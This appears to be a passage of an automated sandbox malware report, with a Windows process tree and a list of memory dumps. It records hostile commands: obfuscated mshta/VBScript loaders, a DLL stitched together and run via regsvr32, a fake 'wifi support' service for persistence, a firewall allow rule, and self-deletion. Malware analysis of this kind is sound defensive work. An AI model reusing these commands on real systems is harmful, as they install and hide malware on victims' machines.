                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im C937.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C937.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2296
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im C937.exe /f
                                                                                                                                                      3⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2164
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      3⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:916
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CB99.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CB99.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2200
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\CB99.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\CB99.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1404
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\CB99.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\CB99.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3896
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                                                                            ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2220
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                              5⤵
                                                                                                                                                                PID:1912
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2580
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:508
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3156
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:1160
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:2580
                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                              regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:1912
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill -F -im "CB99.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4040
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E7CD.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E7CD.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3688
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EA7D.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EA7D.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1372
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A5B.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A5B.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3544
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10F3.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\10F3.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3996
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gwqjowi\
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4236
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gffmdzcd.exe" C:\Windows\SysWOW64\gwqjowi\
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4484
                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                        "C:\Windows\System32\sc.exe" create gwqjowi binPath= "C:\Windows\SysWOW64\gwqjowi\gffmdzcd.exe /d\"C:\Users\Admin\AppData\Local\Temp\10F3.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2296
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          "C:\Windows\System32\sc.exe" description gwqjowi "wifi internet conection"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4540
                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                            "C:\Windows\System32\sc.exe" start gwqjowi
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4368
                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4156
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1B16.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1B16.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                              PID:1456
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4824
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:524
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3006.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3006.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4476
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2364
                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4736
                                                                                                                                                                                  • C:\Windows\SysWOW64\gwqjowi\gffmdzcd.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\gwqjowi\gffmdzcd.exe /d"C:\Users\Admin\AppData\Local\Temp\10F3.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4264
                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                        svchost.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6124
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4456
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5072
                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:4108
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4012
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2768
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5948
                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  PID:6284
                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:6300
                                                                                                                                                                                                  • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                    "LogonUI.exe" /flags:0x0 /state0:0xa3ae4055 /state1:0x41c64e6d
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:6540
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5572
                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5508
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2564
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3848
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6900
                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6968
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6476
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3544
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6432

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • memory/524-312-0x00000000022E0000-0x00000000022E2000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/684-211-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/684-210-0x0000000000CE0000-0x0000000000CE5000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                        • memory/700-170-0x0000000000880000-0x00000000008EB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          428KB

                                                                                                                                                                                                                        • memory/700-169-0x00000000008F0000-0x0000000000964000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                        • memory/948-114-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                        • memory/1372-295-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                        • memory/1456-261-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                        • memory/1456-267-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                        • memory/1760-188-0x0000000000520000-0x000000000052C000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                        • memory/1760-186-0x0000000000530000-0x0000000000536000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                        • memory/1912-349-0x0000000004AC0000-0x0000000004B59000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          612KB

                                                                                                                                                                                                                        • memory/1912-305-0x00000000047B0000-0x000000000489D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          948KB

                                                                                                                                                                                                                        • memory/1912-301-0x00000000003B0000-0x00000000003B1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/1912-306-0x0000000004950000-0x0000000004A03000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          716KB

                                                                                                                                                                                                                        • memory/1912-342-0x0000000004A10000-0x0000000004ABD000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          692KB

                                                                                                                                                                                                                        • memory/1912-350-0x0000000004AC0000-0x0000000004B59000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          612KB

                                                                                                                                                                                                                        • memory/1912-293-0x0000000004070000-0x00000000042B9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.3MB

                                                                                                                                                                                                                        • memory/1928-182-0x0000000000C40000-0x0000000000C49000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/1928-180-0x0000000000C50000-0x0000000000C55000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                        • memory/2088-304-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2144-133-0x0000000000300000-0x0000000000301000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2144-140-0x0000000004C60000-0x0000000004C61000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2144-135-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2144-136-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2232-212-0x00000000005C0000-0x00000000005C9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/2232-194-0x00000000005D0000-0x00000000005D5000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                        • memory/2304-181-0x0000000000F60000-0x0000000000F6F000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          60KB

                                                                                                                                                                                                                        • memory/2304-179-0x0000000000F70000-0x0000000000F79000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/2764-147-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                        • memory/2764-207-0x0000000006C70000-0x0000000006C71000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-153-0x0000000005A80000-0x0000000005A81000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-155-0x0000000005580000-0x0000000005581000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-157-0x00000000055C0000-0x00000000055C1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-201-0x00000000071A0000-0x00000000071A1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-160-0x0000000005470000-0x0000000005A76000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                        • memory/2764-198-0x0000000006AA0000-0x0000000006AA1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-154-0x0000000005520000-0x0000000005521000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-162-0x0000000005830000-0x0000000005831000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2764-216-0x0000000006FA0000-0x0000000006FA1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2936-264-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          692KB

                                                                                                                                                                                                                        • memory/2936-262-0x00000000020D0000-0x000000000216D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          628KB

                                                                                                                                                                                                                        • memory/2984-119-0x00000000010D0000-0x00000000010E7000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          92KB

                                                                                                                                                                                                                        • memory/2984-242-0x00000000032C0000-0x00000000032D6000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                        • memory/2992-185-0x0000000000400000-0x000000000049E000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          632KB

                                                                                                                                                                                                                        • memory/2992-184-0x0000000001FA0000-0x0000000002031000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          580KB

                                                                                                                                                                                                                        • memory/3056-239-0x0000000004C42000-0x0000000004C43000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3056-240-0x0000000004C43000-0x0000000004C44000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3056-236-0x00000000005B0000-0x00000000006FA000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                        • memory/3056-238-0x0000000004C40000-0x0000000004C41000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3056-237-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          444KB

                                                                                                                                                                                                                        • memory/3056-241-0x0000000004C44000-0x0000000004C46000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/3176-117-0x00000000001E0000-0x00000000001EC000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                        • memory/3688-357-0x0000000004830000-0x0000000004838000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                        • memory/3688-351-0x00000000036A0000-0x00000000036B0000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                        • memory/3688-343-0x0000000003460000-0x0000000003470000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                        • memory/3688-275-0x0000000000400000-0x0000000000664000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.4MB

                                                                                                                                                                                                                        • memory/3692-175-0x0000000000540000-0x0000000000547000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          28KB

                                                                                                                                                                                                                        • memory/3692-177-0x0000000000530000-0x000000000053B000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          44KB

                                                                                                                                                                                                                        • memory/3828-323-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                        • memory/3936-266-0x00000000021D0000-0x00000000022EB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                        • memory/3948-191-0x0000000000730000-0x0000000000734000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                        • memory/3948-196-0x0000000000720000-0x0000000000729000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/3988-221-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/3988-220-0x0000000000470000-0x0000000000479000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/4036-189-0x0000000002130000-0x000000000214B000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                        • memory/4036-206-0x0000000004AB3000-0x0000000004AB4000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4036-203-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          444KB

                                                                                                                                                                                                                        • memory/4036-193-0x0000000004AB2000-0x0000000004AB3000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4036-204-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4036-200-0x0000000000470000-0x00000000005BA000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                        • memory/4036-192-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4036-209-0x0000000004AB4000-0x0000000004AB6000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/4036-195-0x0000000002440000-0x0000000002459000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                        • memory/4040-172-0x0000000000FE0000-0x0000000000FE7000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          28KB

